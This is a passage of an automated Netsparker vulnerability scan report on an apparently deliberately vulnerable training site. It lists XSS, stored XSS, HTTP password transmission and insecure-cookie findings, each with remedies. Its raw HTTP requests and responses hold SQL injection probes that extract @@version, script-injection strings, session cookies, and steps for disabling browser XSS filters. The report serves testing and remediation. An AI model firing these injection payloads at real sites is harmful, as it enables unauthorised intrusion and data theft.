<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value '_2dilemma' to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value '_2dilemma' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
1 TOTAL (IMPORTANT), 1 CONFIRMED

3 Cross-site Scripting

Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking user's active session
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

Remedy References
- Microsoft Anti-XSS Library
- OWASP XSS Prevention Cheat Sheet
- OWASP AntiSamy Java

External References
- XSS Cheat Sheet
- OWASP - cross-site scripting
- XSS Shell
- XSS Tunnelling

Proof of Concept Notes
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than for testing purposes. Even though browsers have certain checks to prevent cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism, therefore a web application should not rely on this kind of client-side browser check.

Chrome
Open command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor

Internet Explorer
Click Tools -> Internet Options and then navigate to the Security tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to disabled. Click OK. Click Yes to accept the warning, followed by Apply.

Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double-clicking the row.

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED http://hackyourselffirst.troyhunt.com/Search?searchTerm=%2Bnetsparker(9)%2B

Parameters:
Parameter | Type | Value
searchTerm | GET | +netsparker(9)+

Request:
GET /Search?searchTerm=%2Bnetsparker(9)%2B HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">+netsparker(9)+</span>&quot;</h2>
<p class="alert alert-error">No results found for your search.</p>
</section><hr><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$("#results tr").click(function () { var url = "/Supercar/" + $(this).attr("id"); window.location.href = url; });
$("#searchTerm").val("+netsparker(9)+");</script>
<script>(function (i, s, o, g, r, a, m) { i["GoogleAnalyticsObject"] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
1 TOTAL (IMPORTANT), 1 CONFIRMED

4 Permanent Cross-site Scripting

Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript within the browser.

Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.

Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen
- XSS can enable client-side worms, which could modify, delete or steal other users' data within the application
- The website can be redirected to a new location, defaced or used as a phishing site

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References
- [ASP.NET] - Microsoft Anti-XSS Library
- OWASP XSS Prevention Cheat Sheet
- OWASP AntiSamy Java

External References
- XSS Cheat Sheet
- OWASP - Cross-site Scripting
- XSS Shell
- XSS Tunnelling

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Supercar/3

Injection URL: http://hackyourselffirst.troyhunt.com/api/vote

Injection Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3E%3Cnet+sparker%3dnetsparker(0x00043F)%3E

Identification Request:
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response:
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker="netsparker(0x00043F)"></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
1 TOTAL (IMPORTANT), 1 CONFIRMED

5 Password Transmitted over HTTP

Netsparker detected that password data is being transmitted over HTTP.

Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Register

Form target action: http://hackyourselffirst.troyhunt.com/Account/Register

Request:
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1 TOTAL (IMPORTANT), 1 CONFIRMED

6 Cookie Not Marked as Secure

Netsparker identified a cookie not marked as secure and transmitted over HTTPS.

This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

Impact
This cookie will be transmitted over a HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.

Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)

Remedy
Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.

External References
- .NET Cookie.Secure Property
- How to Create Totally Secure Cookies

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED https://hackyourselffirst.troyhunt.com/Account/Login

Identified Cookie: AuthCookie

Request:
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true

Response:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
1 TOTAL (IMPORTANT)

7 Out-of-date Version (Microsoft SQL Server)

Netsparker identified you are using an out-of-date version of Microsoft SQL Server.

Impact
Since this is an old version of the software, it may be vulnerable to attacks.

Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.

Classification
OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310
7.1 /Make1 http://hackyourselffirst.troyhunt.com/Make1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Identified Version: 110922217
Latest Version: 12002000
Vulnerability Database: Result is based on 18.08.2014 vulnerability database content.
Certainty

Request:
GET /Make1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>
 body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
 p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
 b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
 H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
 H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
 pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
 .marker {font-weight: bold; color: black;text-decoration: none;}
 .version {color: gray;}
 .error {margin-bottom: 10px;}
 .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
 @media screen and (max-width: 639px) {
  pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; }
 }
 @media screen and (max-width: 479px) {
  pre { width: 280px; }
 }
</style></head>
<body bgcolor="white">
<span><H1>Server Error in Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
1 TOTAL (MEDIUM), 1 CONFIRMED

8 Critical Form Served over HTTP

Netsparker detected that a critical form is served over HTTP.

Impact
If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Login

Form target action: https://hackyourselffirst.troyhunt.com/Account/Login

Request:
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
3 TOTAL (MEDIUM)

9 [Possible] Cross-site Scripting

Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks

Remedy
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.

There are a number of pre-defined, well-structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References
- [ASP.NET] - Microsoft Anti-XSS Library
- OWASP XSS Prevention Cheat Sheet

External References
- XSS Cheat Sheet
- OWASP - cross-site scripting
- XSS Shell
- XSS Tunnelling

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote http://hackyourselffirst.troyhunt.com/api/vote

Parameters:
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | --></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers with automatic MIME sniffing, such as Internet Explorer.

Certainty

Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.\r\nIncorrect syntax near '--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":" at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n at Web.Controllers.VoteController.Post(Vote vote)\r\n at lambda_method(Closure , Object , Object[] )\r\n at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters:
Parameter | Type | Value
nsextt | GET | "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
